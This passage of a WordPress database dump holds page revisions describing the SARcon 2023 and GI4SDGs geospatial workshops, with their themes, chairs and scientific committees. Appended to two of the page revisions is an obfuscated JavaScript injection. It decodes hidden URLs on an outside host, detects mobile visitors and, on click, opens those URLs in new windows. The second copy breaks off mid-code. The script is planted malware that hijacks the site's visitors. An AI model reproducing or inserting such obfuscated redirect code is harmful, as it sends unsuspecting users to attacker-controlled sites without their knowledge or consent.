applications','','inherit','closed','closed','','2736-revision-v1','','','2022-10-13 18:16:09','2022-10-13 18:16:09','',2736,'https://gsw2023.com/?p=2762',0,'revision','',0),
(2763,1,'2022-10-13 18:53:10','2022-10-13 18:53:10','','w114','','inherit','open','closed','','w114-2','','','2022-10-13 18:53:10','2022-10-13 18:53:10','',2751,'https://gsw2023.com/wp-content/uploads/2022/10/w114-1.jpg',0,'attachment','image/jpeg',0),
(2764,1,'2022-10-13 19:02:47','2022-10-13 19:02:47','','w113','','inherit','open','closed','','w113-2','','','2022-10-13 19:02:47','2022-10-13 19:02:47','',2749,'https://gsw2023.com/wp-content/uploads/2022/10/w113-1.jpg',0,'attachment','image/jpeg',0),
(2765,1,'2022-10-13 19:03:14','2022-10-13 19:03:14','','w112','','inherit','open','closed','','w112-2','','','2022-10-13 19:03:14','2022-10-13 19:03:14','',2747,'https://gsw2023.com/wp-content/uploads/2022/10/w112-1.jpg',0,'attachment','image/jpeg',0),
(2766,1,'2022-10-13 19:03:42','2022-10-13 19:03:42','','w111','','inherit','open','closed','','w111-2','','','2022-10-13 19:03:42','2022-10-13 19:03:42','',2745,'https://gsw2023.com/wp-content/uploads/2022/10/w111-1.jpg',0,'attachment','image/jpeg',0),
(2767,1,'2022-10-13 23:16:09','2022-10-13 23:16:09','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2743\" img_size=\"1200*600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Spaceborne synthetic aperture radar satellites are nowadays often developed in constellations of two or more satellites providing faster revisit times. Other innovative constellation and SAR concepts include geosynchronous SAR systems and non-sun-synchronous orbits for special applications. In this context, SARcon aims to provide a unique forum for professionals involved in spaceborne synthetic aperture system design and application development to share research ideas, present latest achievements, foster cooperation, and encourage international collaboration. The workshop will have two days of technical program, including plenary sessions and invited papers. Contributions will be invited from researchers and participant from ISPRS society in general, including topics on SAR satellite system design, applications in interferometry and tomography, bi- and multi-static SAR and present and upcoming SAR constellations.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" post_content_paddings=\"25px 20px 20px 20px\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"47\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Discussion on new SAR satellite constellations for bi-static and mono-static pursuit pairs</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Non-sun-synchronous orbits for new applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Geosynchronous SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Innovative applications of SAR and of data from SAR constellations</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ DEM/DSM and global DEM generation techniques and applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Surface motion estimation from SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ SAR for surveillance and security related applications</strong></h6>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee:</strong></h5>\n<h6>\n<strong>⦁ Prof. Florence Tupin, France</strong></h6>\n<h6>\n<strong>⦁ Prof. Jianya Gong, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Michael Schmitt, Germany</strong></h6>\n<h6>\n<strong>⦁ Prof. Chibiao Ding, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Yunkai Deng, China</strong></h6>\n<h6>\n<strong>⦁ Assoc. Prof. Dr. Nusret Demir, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Rafael Rosa, Brazil</strong></h6>\n<h6>\n<strong>⦁ Dr. Füsun Balik Sanli, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Bahaa Mohamadi, Egypt</strong></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SARcon 2023 - SAR constellations and applications','','inherit','closed','closed','','2736-revision-v1','','','2022-10-13 23:16:09','2022-10-13 23:16:09','',2736,'https://gsw2023.com/?p=2767',0,'revision','',0),
(2768,1,'2022-10-13 23:29:40','2022-10-13 23:29:40','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2770\" img_size=\"1400x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">The Geospatial Information and SDG Nexus: GI4SDGs</span></strong></h5>\r\n<h5></h5>\r\n<p>&nbsp;</p>\r\n<h5 style=\"text-align: justify; color: black;\">In September 2015, the United Nations adopted “Transforming Our World: the 2030 Agenda for Sustainable Development” as a new ambitious global development plan with 17 Sustainable Development Goals (SDGs) and 169 targets. Recognizing the complex and diverse challenges the world is facing today, this agenda aims to end extreme poverty, fight inequality and injustice, and combat climate change. In order to ensure its successful implementation, the United Nations has been devoting to establishing a systematic follow-up and review of the progress towards SDGs at national, regional and global levels, through an indicator-based and data-driven monitoring approach.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">Reliable and up-to-date geospatial data plays a fundamental role in the monitoring process, and the utilization of geospatial tools in SDGs monitoring has become a critical task for ISPRS and international geospatial communities. In the year 2019, ISPRS council has decided to set up a scientific program on “Geospatial Information-enabled SDGs Monitoring for the 2030 Agenda”, jointly with other international organizations. Its overreaching goal is to promote the best use of geospatial information in supporting SDGs monitoring and analysis through mobilizing and integrating all possible resources from ISPRS members and other stakeholders. The first ISPRS workshop on Geospatial Information for Sustainable Development Goals (GI4SDGs) was successfully organized in Changsha, China from Nov.19-20, 2019.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">This second GI4SDGs workshop will provide an interdisciplinary platform to present the latest development and progress in the area of geospatial-enabled SDG monitoring and application. It will bring together people of different communities and disciplines, such as geomatics and remote sensing, environmental and urban studies, deep learning and service computing. Experts and users will present their novel and innovative methods to highlight successful case studies and to explore possible collaboration.</h5>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"6\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\r\n<h5 style=\"text-align: justify; color: red;\"><strong>The workshop will concentrate on the following topics:</strong></h5>\r\n<h6><strong>⦁ Opportunities and challenges of geospatial information-enabled SDGs;</strong></h6>\r\n<h6><strong>⦁ SDGs monitoring examples with geospatial perspective;</strong></h6>\r\n<h6><strong>⦁ Definition and modeling of geospatial essential variables for SDGs monitoring;</strong></h6>\r\n<h6><strong>⦁ Algorithms and methods for deriving geospatial essential variables, e.g., machine learning, big data analytics, cloud computing and other technologies;</strong></h6>\r\n<h6><strong>⦁ Global mapping initiatives and progresses at national and international levels;</strong></h6>\r\n<h6><strong>⦁ Integrating crowd-sourced data and VGI with geospatial data for SDGs monitoring;</strong></h6>\r\n<h6><strong>⦁ Developments and applications of geospatial knowledge service and collaborative platforms to meet SDGs assessment and monitoring;</strong></h6>\r\n<h6><strong>⦁ Ethical use of geospatial data and SDGs</strong></h6>\r\n<h6><strong>⦁ Other related topics.</strong></h6>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<h5 style=\"text-align: justify; color: red;\"><strong>The workshop plans to have the following four technical sessions:</strong></h5>\r\n<h6><strong>⦁ Session 1: Assessing SDGs progress by integrating geospatial and statistical information</strong></h6>\r\n<h6><strong>⦁ Session 2: Extracting Geospatial Information for SDGs</strong></h6>\r\n<h6><strong>⦁ Session 3: Monitoring SDGs with geospatially essential variables</strong></h6>\r\n<h6><strong>⦁ Session 4: ISPRS Scientific Program GI4SDGs: Progress and Collaboration</strong></h6>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\r\n<h1 style=\"text-align: center;\"><strong>Workshop Chairs</strong></h1>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"48\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"6\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\r\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee</strong></h5>\r\n<p>⦁ Yifang Ban, KTH Royal Institute of Technology, Sweden<br />\r\n⦁ Maria Antonia Brovelli, Politecnico di Milano, Italy<br />\r\n⦁ Silvana Philippi Camboin, Universidade Federal do Paraná: Curitiba, Brazil<br />\r\n⦁ Jun Chen, National Geomatics Center of China, China<br />\r\n⦁ Laurent Durieux, GEO secretariat, France<br />\r\n⦁ Hongchao Fan, Norwegian University of Science and Technology, Germany<br />\r\n⦁ Gregory Giuliani, University of Geneva, Geneva, Switzerland<br />\r\n⦁ Songnian Li, Toronto Metropolitan University, Canada<br />\r\n⦁ Marguerite Madden, University of Georgia, USA<br />\r\n⦁ Lucy W. Mburu, College of Technology, KCA University, Kenya<br />\r\n⦁ Terje Midtbø, Norwegian University of Science and Technology, Norway<br />\r\n⦁ Jon Mills, Newcastle University, UK<br />\r\n⦁ Petros Patias, Aristotle University, Greece<br />\r\n⦁ Daniele Oxoli, Politecnico di Milano<br />\r\n⦁ Shu Peng, National Geomatics Center of China, China<br />\r\n⦁ Aurélie Sand, Centre National d\'Etudes Spatiales, France<br />\r\n⦁ Hao Wu, National Geomatics Center of China, China<br />\r\n⦁ Alexander Zipf, Heidelberg University, Germany[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 